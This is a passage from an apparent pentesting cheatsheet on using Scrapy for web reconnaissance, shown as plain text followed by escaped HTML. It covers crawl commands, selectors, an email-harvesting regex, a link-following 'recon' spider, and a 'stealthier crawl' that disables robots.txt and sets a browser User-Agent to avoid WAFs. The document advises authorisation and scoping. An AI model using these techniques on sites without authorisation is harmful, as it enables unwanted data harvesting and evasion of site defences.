\u0026lt;url\u0026gt; --spider=\u0026lt;name\u0026gt; Parse a URL with a spider\u0026rsquo;s callback scrapy list List available spiders in the project scrapy settings --get \u0026lt;KEY\u0026gt; Print a settings value scrapy bench Run a quick benchmark crawl Common crawl Flags Flag Description -o \u0026lt;file\u0026gt; Output scraped items to file (.json, .jsonl, .csv, .xml) -O \u0026lt;file\u0026gt; Same as -o but overwrites instead of appending -a \u0026lt;name\u0026gt;=\u0026lt;value\u0026gt; Pass an argument to the spider (e.g. -a domain=example.com) -s \u0026lt;KEY\u0026gt;=\u0026lt;value\u0026gt; Override a setting at runtime -L \u0026lt;level\u0026gt; Log level (DEBUG, INFO, WARNING, ERROR) --logfile \u0026lt;file\u0026gt; Write logs to a file --nolog Disable logging -t \u0026lt;format\u0026gt; Output format when not inferred from extension Common Commands # Create a project scrapy startproject recon # Generate a spider scoped to a domain cd recon scrapy genspider links example.com # Run the spider and export results scrapy crawl links -o results.json # Run a standalone spider with output scrapy runspider spider.py -o output.jsonl # Pass arguments into a spider scrapy crawl links -a domain=example.com -a depth=2 # Override settings on the fly (respect robots.txt off, set delay) scrapy crawl links -s ROBOTSTXT_OBEY=False -s DOWNLOAD_DELAY=1 # Limit log noise scrapy crawl links -L WARNING -o out.csv # Test CSS / XPath selectors interactively scrapy shell \u0026#34;https://example.com\u0026#34; Inside the Scrapy Shell # After: scrapy shell \u0026#34;https://example.com\u0026#34; response.url # Current URL response.status # HTTP status code response.headers # Response headers # CSS selectors response.css(\u0026#39;a::attr(href)\u0026#39;).getall() # All link hrefs response.css(\u0026#39;title::text\u0026#39;).get() # Page title # XPath selectors response.xpath(\u0026#39;//a/@href\u0026#39;).getall() # All link hrefs response.xpath(\u0026#39;//img/@src\u0026#39;).getall() # All image sources # Follow a link fetch(\u0026#39;https://example.com/about\u0026#39;) # Regex over the body (e.g. emails) import re re.findall(r\u0026#39;[\\w.+-]+@[\\w-]+\\.[\\w.-]+\u0026#39;, response.text) Minimal Recon Spider # save as spider.py, run with: scrapy runspider spider.py -o out.json import scrapy from urllib.parse import urlparse class ReconSpider(scrapy.Spider): name = \u0026#34;recon\u0026#34; start_urls = [\u0026#34;https://example.com\u0026#34;] def parse(self, response): # Collect all links and follow same-domain ones for href in response.css(\u0026#39;a::attr(href)\u0026#39;).getall(): yield {\u0026#34;link\u0026#34;: response.urljoin(href)} if urlparse(response.urljoin(href)).netloc == urlparse(response.url).netloc: yield response.follow(href, callback=self.parse) Useful Settings (settings.py / -s overrides) Setting Description ROBOTSTXT_OBEY Whether to honour robots.txt (default True) DOWNLOAD_DELAY Seconds between requests (politeness / rate limiting) CONCURRENT_REQUESTS Max simultaneous requests DEPTH_LIMIT Max crawl depth (0 = unlimited) USER_AGENT Custom User-Agent string RETRY_TIMES Number of retries on failed requests HTTPCACHE_ENABLED Cache responses locally to avoid re-fetching AUTOTHROTTLE_ENABLED Auto-adjust delay based on server load # Example: stealthier crawl scrapy crawl recon \\ -s DOWNLOAD_DELAY=2 \\ -s CONCURRENT_REQUESTS=2 \\ -s AUTOTHROTTLE_ENABLED=True \\ -s USER_AGENT=\u0026#34;Mozilla/5.0\u0026#34; Notes Active — Scrapy makes real HTTP requests to the target; only crawl in-scope assets. Set ROBOTSTXT_OBEY=False only when authorised; by default Scrapy respects robots.txt. Use DOWNLOAD_DELAY / AUTOTHROTTLE to avoid hammering targets and tripping WAFs. Great base for custom recon crawlers — [[reconspider]] is a Scrapy-based spider built exactly for this. Export to JSON/JSONL then post-process with jq to extract emails, subdomains, and links. ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/web-crawling/scrapy/","summary":"\u003ch1 id=\"scrapy-cheatsheet\"\u003eScrapy Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Fast, high-level web crawling and scraping framework for Python — used to build custom spiders that extract links, emails, subdomains, and other data from target sites\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Via pip (recommended)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epip3 install scrapy\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Via apt\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install python3-scrapy\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Via conda\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003econda install -c conda-forge scrapy\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Verify\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy version\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Quick one-off crawl from the shell (no project needed)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy shell \u0026lt;url\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy shell https://example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Fetch a single page and dump to stdout\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy fetch https://example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# View the page as Scrapy sees it (opens in browser)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy view https://example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Run a standalone spider file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy runspider myspider.py\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"command-line-tools\"\u003eCommand-Line Tools\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eCommand\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy startproject \u0026lt;name\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCreate a new project skeleton\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy genspider \u0026lt;name\u0026gt; \u0026lt;domain\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eGenerate a new spider from template\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy crawl \u0026lt;spider\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRun a spider inside a project\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy runspider \u0026lt;file.py\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRun a self-contained spider file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy shell \u0026lt;url\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eInteractive scraping shell (test selectors)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy fetch \u0026lt;url\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDownload a page using Scrapy\u0026rsquo;s downloader\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy view \u0026lt;url\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOpen the fetched page in a browser\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy parse \u0026lt;url\u0026gt; --spider=\u0026lt;name\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eParse a URL with a spider\u0026rsquo;s callback\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy list\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eList available spiders in the project\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy settings --get \u0026lt;KEY\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePrint a settings value\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003escrapy bench\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRun a quick benchmark crawl\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-crawl-flags\"\u003eCommon crawl Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-o \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput scraped items to file (\u003ccode\u003e.json\u003c/code\u003e, \u003ccode\u003e.jsonl\u003c/code\u003e, \u003ccode\u003e.csv\u003c/code\u003e, \u003ccode\u003e.xml\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-O \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSame as \u003ccode\u003e-o\u003c/code\u003e but overwrites instead of appending\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-a \u0026lt;name\u0026gt;=\u0026lt;value\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePass an argument to the spider (e.g. \u003ccode\u003e-a domain=example.com\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-s \u0026lt;KEY\u0026gt;=\u0026lt;value\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOverride a setting at runtime\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-L \u0026lt;level\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eLog level (\u003ccode\u003eDEBUG\u003c/code\u003e, \u003ccode\u003eINFO\u003c/code\u003e, \u003ccode\u003eWARNING\u003c/code\u003e, \u003ccode\u003eERROR\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--logfile \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWrite logs to a file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--nolog\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDisable logging\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-t \u0026lt;format\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput format when not inferred from extension\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-commands\"\u003eCommon Commands\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Create a project\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy startproject recon\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Generate a spider scoped to a domain\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecd recon\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy genspider links example.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Run the spider and export results\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy crawl links -o results.json\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Run a standalone spider with output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy runspider spider.py -o output.jsonl\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Pass arguments into a spider\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy crawl links -a domain\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003eexample.com -a depth\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u003cspan style=\"color:#ae81ff\"\u003e2\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Override settings on the fly (respect robots.txt off, set delay)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy crawl links -s ROBOTSTXT_OBEY\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003eFalse -s DOWNLOAD_DELAY\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Limit log noise\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy crawl links -L WARNING -o out.csv\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Test CSS / XPath selectors interactively\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003escrapy shell \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://example.com\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"inside-the-scrapy-shell\"\u003eInside the Scrapy Shell\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-python\" data-lang=\"python\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# After: scrapy shell \u0026#34;https://example.com\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eresponse\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003eurl \u003cspan style=\"color:#75715e\"\u003e# Current URL\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eresponse\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003estatus \u003cspan style=\"color:#75715e\"\u003e# HTTP status code\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eresponse\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003eheaders \u003cspan style=\"color:#75715e\"\u003e# Response headers\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# CSS selectors\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eresponse\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003ecss(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;a::attr(href)\u0026#39;\u003c/span\u003e)\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003egetall() \u003cspan style=\"color:#75715e\"\u003e# All link hrefs\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eresponse\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003ecss(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;title::text\u0026#39;\u003c/span\u003e)\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003eget() \u003cspan style=\"color:#75715e\"\u003e# Page title\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# XPath selectors\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eresponse\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003expath(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;//a/@href\u0026#39;\u003c/span\u003e)\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003egetall() \u003cspan style=\"color:#75715e\"\u003e# All link hrefs\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eresponse\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003expath(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;//img/@src\u0026#39;\u003c/span\u003e)\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003egetall() \u003cspan style=\"color:#75715e\"\u003e# All image sources\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Follow a link\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efetch(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;https://example.com/about\u0026#39;\u003c/span\u003e)\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Regex over the body (e.g. emails)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#f92672\"\u003eimport\u003c/span\u003e re\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ere\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003efindall(\u003cspan style=\"color:#e6db74\"\u003er\u003c/span\u003e\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;[\\w.+-]+@[\\w-]+\\.[\\w.-]+\u0026#39;\u003c/span\u003e, response\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003etext)\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"minimal-recon-spider\"\u003eMinimal Recon Spider\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-python\" data-lang=\"python\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# save as spider.py, run with: scrapy runspider spider.py -o out.json\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#f92672\"\u003eimport\u003c/span\u003e scrapy\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#f92672\"\u003efrom\u003c/span\u003e urllib.parse \u003cspan style=\"color:#f92672\"\u003eimport\u003c/span\u003e urlparse\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eclass\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eReconSpider\u003c/span\u003e(scrapy\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003eSpider):\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e name \u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;recon\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e start_urls \u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e [\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://example.com\u0026#34;\u003c/span\u003e]\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#66d9ef\"\u003edef\u003c/span\u003e \u003cspan style=\"color:#a6e22e\"\u003eparse\u003c/span\u003e(self, response):\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#75715e\"\u003e# Collect all links and follow same-domain ones\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#66d9ef\"\u003efor\u003c/span\u003e href \u003cspan style=\"color:#f92672\"\u003ein\u003c/span\u003e response\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003ecss(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;a::attr(href)\u0026#39;\u003c/span\u003e)\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003egetall():\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#66d9ef\"\u003eyield\u003c/span\u003e {\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;link\u0026#34;\u003c/span\u003e: response\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003eurljoin(href)}\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#66d9ef\"\u003eif\u003c/span\u003e urlparse(response\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003eurljoin(href))\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003enetloc \u003cspan style=\"color:#f92672\"\u003e==\u003c/span\u003e urlparse(response\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003eurl)\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003enetloc:\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#66d9ef\"\u003eyield\u003c/span\u003e response\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003efollow(href, callback\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003eself\u003cspan style=\"color:#f92672\"\u003e.\u003c/span\u003eparse)\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"useful-settings-settingspy---s-overrides\"\u003eUseful Settings (settings.py / -s 